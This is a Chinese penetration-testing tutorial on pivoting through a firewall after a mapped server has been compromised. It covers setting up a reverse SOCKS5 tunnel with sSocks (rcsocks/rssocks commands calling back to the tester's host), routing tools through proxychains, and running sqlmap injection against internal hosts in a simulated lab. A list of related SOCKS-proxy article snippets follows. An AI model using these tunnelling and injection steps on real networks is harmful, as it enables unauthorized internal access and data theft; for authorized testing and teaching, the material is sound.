随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射到外网的内网服务器权限后,如何利用socks代理反弹获得内网访问权限。
1. sSocks
sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.13,可在以下链接处下载。http://sourceforge.net/projects/ssocks/下载解压后,执行命令编译。./configure && make
编译完成,进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:
程序 功能
nsocks 类似通过Socks5代理后的netcat,可用来测试socks server
ssocksd 用来开启Socks5代理服务
ssocks 本地启用Socks5服务,并反弹到另一IP地址
rcsocks 接收反弹过来的Socks5服务,并转向另一端口
2.模拟网络环境说明 本文模拟的网络环境见下图1,渗透测试端IP为192.168.10.50,内网区域IP段192.168.206.0/24,内网区域能正常访问192.168.10.0/24,现假设已获得192.168.206.130权限。
3.实施Socks代理反弹
1)本地监听端口
在渗透测试端192.168.10.50执行./rcsocks -l 1088 -p 1080 -vv
等待远程Socks5服务器访问本地1080端口,创建端口1080与本地端口1088的连接通道,如图2。
2)开启Socks5代理服务,反弹
在192.168.206.130上执行./rssocks -vv -s 192.168.10.50:1080
启用Socks5服务,反弹到192.168.10.50的端口1080上,如图3。
此时在渗透测试端192.168.10.50可看到通道连接成功,效果如图4。
4.利用proxychains进行Socks5代理
通过前面的步骤,Socks5代理已创建完成了。由于在渗透测试过程中,需要使用不同的工具程序,而在各程序中分别配置Socks5代理信息较为繁琐,而部分程序并不支持配置Socks5代理。为了简化这些操作,我们可以采用proxychains。
proxychains是一个代理客户端软件,可以支持几乎所有程序的代理,如ssh,telnet,ftp等。利用proxychains,程序能在代理的环境下被加载运行,而本身不需要具备代理功能。使用前需要对proxychains进行简单配置,打开配置文件proxychains.conf(在BT5位于/etc/proxychains.conf),如图5所示,在[ProxyList]处添加
socks5 127.0.0.1 1088
配置成功后若要启动程序,仅需要在启动程序命令前加上proxychains。
1)启用浏览器firefox,在终端执行命令:proxychains firefox
firefox启动成功,访问192.168.206.135的web服务如图6,通过代理访问成功。
2)利用sqlmap进行注入:
先切换到sqlmap目录
cd /pentest/database/sqlmap
proxychains python sqlmap.py -u “存在SQL注入的链接” –dbs
注入成功,注入点信息及获取数据库信息如图7所示。
5.后记
配合Proxifier软件,可以将window下所有应用使用Socks代理访问。
相关推荐
ssocks 合集反弹socks代理,用于内网管理。
内网安全是信息技术领域中的一个重要话题,特别是在企业网络环境中,域横向内网漫游Socks代理隧道技术是一种解决内网间通信难题的有效方法。本文将详细介绍相关知识点,并通过实际案例来展示如何应用这些技术。 ...
无需多次转发端口,配合hd实现防火墙后的内网渗透,socks代理反弹
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
文档详细描述,linux不通外网的情况下,通过在另一台通外网的服务器搭建socks5代理服务,不通外网的服务器通过socks5代理,成功向外网发送邮件的功能。
Socks5进程代理DLL,配套调用表,在压缩包里面
Proxy是一个高性能的http代理、https代理、socks5代理、内网穿透代理服务器、游戏盾、游戏代理,支持API代理认证,高防服务器。支持正向代理、反向代理、透明代理、TCP和UDP内网穿透、HTTP和HTTPS内网穿透、https和...
SOCKS5是一种网络协议,它允许客户端通过代理服务器与任意IP地址的远程服务器进行通信。在C#中实现一个SOCKS5代理服务器涉及到多个关键概念和技术,这些包括网络编程、套接字(Sockets)、协议解析以及多线程等。...
hpts(http-proxy-to-socks) 一个nodejs客户端将socks代理转换为http代理
本文将深入探讨C#编程语言实现SOCKS5代理协议的基础知识。 SOCKS5是一种广泛使用的互联网协议,用于在客户端和目标服务器之间建立安全的隧道,以实现代理服务。它支持多种网络协议,如TCP和UDP,同时提供了身份验证...
Proxy是一个高性能的http代理、https代理、socks5代理、内网穿透代理服务器、游戏盾、游戏代理,支持API代理认证,高防服务器。支持正向代理、反向代理、透明代理、TCP和UDP内网穿透、HTTP和HTTPS内网穿透、https和...
《基于Linux操作系统的Socks代理服务》 在现代网络环境中,随着互联网的广泛使用,网络管理变得日益重要。为了有效管理和控制用户的网络访问,代理服务器成为了一种常见且实用的解决方案。尤其在Linux操作系统中,...
基于Netty框架的Socks5代理服务器 内容概要 本项目是一个基于Netty框架实现的Socks5代理服务器,支持Socks5协议的代理功能。项目包含了多个模块,涵盖了从客户端连接处理到服务器端代理转发的完整流程。主要功能...
代理IP分为多种类型,其中HTTP和HTTPS代理主要处理基于HTTP(超文本传输协议)和HTTPS(安全超文本传输协议)的网络请求,而SOCKS5代理则是一种通用的代理协议,支持TCP/IP层的各种协议,包括HTTP、FTP等。...
### SOCKS文献代理的使用方法 #### 一、引言 在互联网的使用过程中,有时候我们需要访问特定资源或保持匿名性,这时候就需要使用到代理服务。SOCKS代理是一种广泛使用的代理协议,它允许客户端通过代理服务器进行...
标题中的"C#写的代理服务器源代码 功能强大 支持http和socks5"表明这是一个用C#编程语言编写的代理服务器程序,它具备处理HTTP和SOCKS5两种协议的能力。HTTP代理主要处理Web浏览器的请求,而SOCKS5代理则是一个更...
在给定的标题“使用Java基于Netty+Socks5+TLS实现的代理服务.zip”中,我们可以看到三个核心概念:Netty、Socks5和TLS,这些都是构建高效、安全网络服务的关键组件。 Netty是一个高性能、异步事件驱动的网络应用...
易语言实现超级代理服务端源码,支持http+socks4+socks5.zip